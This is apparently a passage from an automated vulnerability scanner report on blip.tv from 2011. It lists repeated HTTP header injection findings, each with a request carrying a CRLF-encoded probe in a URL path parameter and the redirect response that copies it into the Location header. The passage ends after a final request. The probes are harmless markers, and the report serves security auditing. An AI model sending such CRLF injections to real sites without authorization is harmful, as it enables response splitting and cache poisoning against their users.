GET /92515%0d%0a3a5487ed0a6/3006747 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/92515 3a5487ed0a6/3006747 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:34 GMT X-Varnish: 1274882698 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/92515 3a5487ed0a6/3006747"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 33f2f%0d%0aa80c1df9336 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/33f2f%0d%0aa80c1df9336 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/33f2f a80c1df9336 Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:38:35 GMT X-Varnish: 344228099 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/33f2f a80c1df9336">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 2defe%0d%0a85750fef9bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2defe%0d%0a85750fef9bf/4341289 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/2defe 85750fef9bf/4341289 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:35 GMT X-Varnish: 1274882913 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/2defe 85750fef9bf/4341289"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 77c44%0d%0a731e5840778 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/77c44%0d%0a731e5840778 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/77c44 731e5840778 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1498218035 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/77c44 731e5840778">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 838ca%0d%0af3fd031237e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /838ca%0d%0af3fd031237e/4416697 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/838ca f3fd031237e/4416697 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1498218069 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/838ca f3fd031237e/4416697"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 44d2f%0d%0a2d5d0852c17 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/44d2f%0d%0a2d5d0852c17 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/44d2f 2d5d0852c17 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1498218133 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/44d2f 2d5d0852c17">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 7ba8a%0d%0a36f11fef696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7ba8a%0d%0a36f11fef696/4469619 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/7ba8a 36f11fef696/4469619 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:35 GMT X-Varnish: 2146046709 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/7ba8a 36f11fef696/4469619"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d9a18%0d%0a6d93c89ed7b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/d9a18%0d%0a6d93c89ed7b HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/d9a18 6d93c89ed7b Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:36 GMT X-Varnish: 1274882937 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/d9a18 6d93c89ed7b">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 33faa%0d%0afe8f417e499 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /33faa%0d%0afe8f417e499/4581305 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/33faa fe8f417e499/4581305 Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Date: Thu, 20 Jan 2011 00:38:34 GMT X-Varnish: 1498217742 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/33faa fe8f417e499/4581305"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7e2f5%0d%0a1833df07fdd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/7e2f5%0d%0a1833df07fdd HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/7e2f5 1833df07fdd Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:34 GMT X-Varnish: 1324528387 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/7e2f5 1833df07fdd">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload f67ac%0d%0a68d36caf2a2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f67ac%0d%0a68d36caf2a2/4584742 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/f67ac 68d36caf2a2/4584742 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:33 GMT X-Varnish: 2146046439 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/f67ac 68d36caf2a2/4584742"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload e960c%0d%0ab5af3a4e13a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/e960c%0d%0ab5af3a4e13a HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/e960c b5af3a4e13a Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:38:34 GMT X-Varnish: 344227963 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/e960c b5af3a4e13a">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 39bb4%0d%0a4b50fb528ed was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /39bb4%0d%0a4b50fb528ed/4590551 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/39bb4 4b50fb528ed/4590551 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:33 GMT X-Varnish: 1025267706 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/39bb4 4b50fb528ed/4590551"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload afb39%0d%0a42540f14b1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/afb39%0d%0a42540f14b1e HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/afb39 42540f14b1e Content-Type: text/html; charset=iso-8859-1 Content-Length: 298 Date: Thu, 20 Jan 2011 00:38:34 GMT X-Varnish: 1025267752 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/afb39 42540f14b1e">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload c015b%0d%0a5a45b6bf0c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c015b%0d%0a5a45b6bf0c7/4627157 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/c015b 5a45b6bf0c7/4627157 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:31 GMT X-Varnish: 1025267356 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/c015b 5a45b6bf0c7/4627157"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload eabb0%0d%0ab16f0f647e2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/eabb0%0d%0ab16f0f647e2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/eabb0 b16f0f647e2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:31 GMT X-Varnish: 1498217357 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/eabb0 b16f0f647e2">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 57924%0d%0a766c2b1b358 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /57924%0d%0a766c2b1b358/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/57924 766c2b1b358/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 364 Date: Thu, 20 Jan 2011 00:38:01 GMT X-Varnish: 2146042173 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/57924 766c2b1b358/4639878?f ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 5186e%0d%0a79aa2929b74 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/5186e%0d%0a79aa2929b74?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/5186e 79aa2929b74?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 376 Date: Thu, 20 Jan 2011 00:38:01 GMT X-Varnish: 344223698 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/5186e 79aa2929b74?file ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 12279%0d%0ae4d4ddbbb2b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /12279%0d%0ae4d4ddbbb2b/4644899 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/12279 e4d4ddbbb2b/4644899 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:33 GMT X-Varnish: 1248906018 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/12279 e4d4ddbbb2b/4644899"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 903a0%0d%0a91461411a13 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/903a0%0d%0a91461411a13 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/903a0 91461411a13 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:33 GMT X-Varnish: 1248906077 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/903a0 91461411a13">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 934d6%0d%0ae4e44b51785 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /934d6%0d%0ae4e44b51785/4645321 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/934d6 e4e44b51785/4645321 Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Date: Thu, 20 Jan 2011 00:38:30 GMT X-Varnish: 1498217234 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/934d6 e4e44b51785/4645321"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload bef6c%0d%0ac729cead865 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/bef6c%0d%0ac729cead865 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/bef6c c729cead865 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:31 GMT X-Varnish: 1025267327 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/bef6c c729cead865">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 9745c%0d%0a520cfc6583a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9745c%0d%0a520cfc6583a/4648265 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/9745c 520cfc6583a/4648265 Content-Type: text/html; charset=iso-8859-1 Content-Length: 301 Date: Thu, 20 Jan 2011 00:38:31 GMT X-Varnish: 1248905826 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/9745c 520cfc6583a/4648265"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload e99ba%0d%0a03b90571645 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/e99ba%0d%0a03b90571645 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/e99ba 03b90571645 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:32 GMT X-Varnish: 1248905867 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/e99ba 03b90571645">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload fd583%0d%0a41c0b66503e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fd583%0d%0a41c0b66503e/4648488 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/fd583 41c0b66503e/4648488 Content-Type: text/html; charset=iso-8859-1 Content-Length: 286 Date: Thu, 20 Jan 2011 00:38:31 GMT X-Varnish: 2146046122 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/fd583 41c0b66503e/4648488"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 355ea%0d%0a83299189f58 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/355ea%0d%0a83299189f58 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
